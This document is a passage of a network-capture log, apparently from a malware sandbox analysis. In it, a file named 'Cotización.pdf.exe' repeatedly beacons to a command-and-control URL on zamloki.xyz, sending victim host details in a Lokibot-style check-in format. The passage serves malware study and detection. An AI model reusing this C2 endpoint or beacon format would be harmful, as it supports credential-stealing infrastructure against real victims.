                                    Jul 21, 2021 17:02:26.650095940 CEST | 5583 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:26.669073105 CEST | 5584 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:26.932097912 CEST | 5584 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oGfy%2F0%2FKNRzL1tv0sse2iHXUyOw8w1%2F60wleB2Ip6ZHxRWKEOJUxk7Hqsy4XAjuErHqhTX4fwYos2ksHusprEjNzpz5KMNFmd39QKEfrY%2FR66Vw8Iu04ys%2FJcAEBKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f70ae2b4dc4-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    66 | 192.168.2.3 | 49803 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:27.149858952 CEST | 5585 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:27.169967890 CEST | 5585 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:27.412652969 CEST | 5586 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W7k9xDjuOxWBRPIbZ5VlVwQNEe09rWF483MXBQJSUChcLNOWg7ZLEhHk31aNuzjLfywTjs5gC2Gp5z3HlggRpgmOzeo76z1hpAObA8XIAdEYv5SvkYPNAUDNEaXEQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f73c8b42bad-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    67 | 192.168.2.3 | 49804 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:27.624311924 CEST | 5587 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:27.642754078 CEST | 5587 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:27.912374973 CEST | 5588 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lzZKHY1RzQKichI%2FGgCR5tOOcZ2LEUXgRczY%2Byk80sazesPu9xEGKYcF1zqab5ScxOyEVm%2BXovRqJFDW0mHdsWO9g2u8rCBFYkVd8XVxlcSU4YpC3YjK3acAG%2BBsBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f76be5d2c0d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    68 | 192.168.2.3 | 49805 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:28.139415979 CEST | 5589 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:28.159077883 CEST | 5589 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:28.404659033 CEST | 5590 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a%2BHufeUyQcTT6oTTKZVHGayb97QnnabOdBzqm8GeYSWc3S7%2BrJ5MFzHx6%2FIqBfSxbUj93gaYviaGtynOhUr3XxRiHx0VDuleCJStAhC7IM0cTGmaKqDN56AHBJruWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f79fc2c0eab-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    69 | 192.168.2.3 | 49806 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:28.618675947 CEST | 5591 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:28.636725903 CEST | 5591 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:28.917639971 CEST | 5592 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pr2SKeSi8EMzu%2FcUgOJ8vTXiySKAV8j2oEXJYko7qNOI9Tb3WNBP%2FHGjW%2BG9BAFaZ2VBES3jROa5g0SRmqZqzPQ5sQHsA3nZ4j3RdR97zlCLcjKkbywiVX7lsV2qXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f7ceac02c56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    7 | 192.168.2.3 | 49735 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:51.903791904 CEST | 1290 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:51.944639921 CEST | 1290 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:52.207218885 CEST | 1291 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7pbbOfsTlpiI36UAMaqM%2Fas%2B3TMzg8bYEDTwgYTiKYRgIzQCvAACuho8but9fD7NLNiTwWFc9wH8TJ0rP%2BTulw1TIWdIzvPzOUXJb59GYgKXowvEE8%2FA2IQ1VbLOZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e977d5d2c56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    70 | 192.168.2.3 | 49807 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:29.123699903 CEST | 5593 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:29.143817902 CEST | 5593 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:29.390497923 CEST | 5594 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xYhNciULP6QX87xZ3fcr%2FVYKRR85yE3YPmrQZtJIkVS2CRoA7VbZ%2BqBZQUGSaXMziZzHwspsKhZM%2BchI8F%2FOjXydGJVU2AkoDIY0wKq1pbJFLD7yZFOFgcIB9QKhUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f801e69bedd-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    71 | 192.168.2.3 | 49808 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:29.594770908 CEST | 5595 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:29.614578962 CEST | 5595 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:29.994438887 CEST | 5596 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0sYEejlNHebXYFchwJWFBKxQ%2FDaLUbln0rD381mfu8I0DsT74BdSsqfBS5KwMjWf%2BLPUcTiyWGxrLyGHY5OhYZWBGOXfTEidJ19H5FDTVBa%2B7x57yvbhidtlOKY7GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f8308fcdfcb-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    72 | 192.168.2.3 | 49809 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:30.220813990 CEST | 5596 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:30.239654064 CEST | 5597 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:30.493889093 CEST | 5597 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hPTz1K7ZEGMMtTOrJmfDeEAoDslOjIFESM50Kih4BPOlO7LgIIUrmFrXcWhRbFkMatGssW7%2B0PIsiv9PHS%2FYu8QEDhRyst6UeaKLpZd2TV5jAVNecoEkTw%2FRKo37hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f86fb9ad6ed-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    73 | 192.168.2.3 | 49810 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:30.746182919 CEST | 5598 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:30.766701937 CEST | 5599 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:31.144428015 CEST | 5599 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GOh5K0GIog9VV7gVcw8s5utJ1afuwLbv8lxgIucFMRFx4XWDYxWQOcdRNSYndc5%2Fy0aeDW74bz3VEwNfVwKDcxgb3qVr5wyIA5Q9nVJDXQap5Kkv%2FLoRf7g8WAkdQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f8a486c2bd2-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    74 | 192.168.2.3 | 49811 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:31.359134912 CEST | 5600 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:31.377118111 CEST | 5600 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:31.715429068 CEST | 5601 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eX2PLm88v2Y8T36ztvCX71RSRBUeTvRQVBj2YyorI3Jy%2FeAC0HrjOQeNSkwal1h06ALv8Gwa334Kxs3%2BS7APV%2ByFPRjmzoY1ru1M39znTytvnknKBwh%2Bf2LMrkxwOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f8e0cd04a7a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    75 | 192.168.2.3 | 49812 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:31.944170952 CEST | 5602 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:31.963999987 CEST | 5602 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:32.224174976 CEST | 5603 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oqTxIS3EwNs5ZteFToLlWsfzFpslFBwLMc33euusIa6omsKL54AKJSRV337IXqhw1M%2Bb7IBI9eDrcReSs%2BAEK06%2BZixfTtB2zoGWMnifhikoNeERl3ftDxBDdjgiSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f91b94c0ea7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    76 | 192.168.2.3 | 49813 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:32.425812006 CEST | 5604 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:32.443944931 CEST | 5604 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:32.695084095 CEST | 5605 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZfGLYtIfuLh0QQ1qqe%2Bw4PL%2Fg4Z76ZH7K4RMVXgyJNAYfe9knpn5Vkuq6QjK3Mu9LjbGtgd3nzTnBQmFi4QqqswFevGbAUvqEa9BK2iPJZiKjrqfRPxgztkNuy1HJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f94bbb64e1a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    77 | 192.168.2.3 | 49814 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:32.886717081 CEST | 5606 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
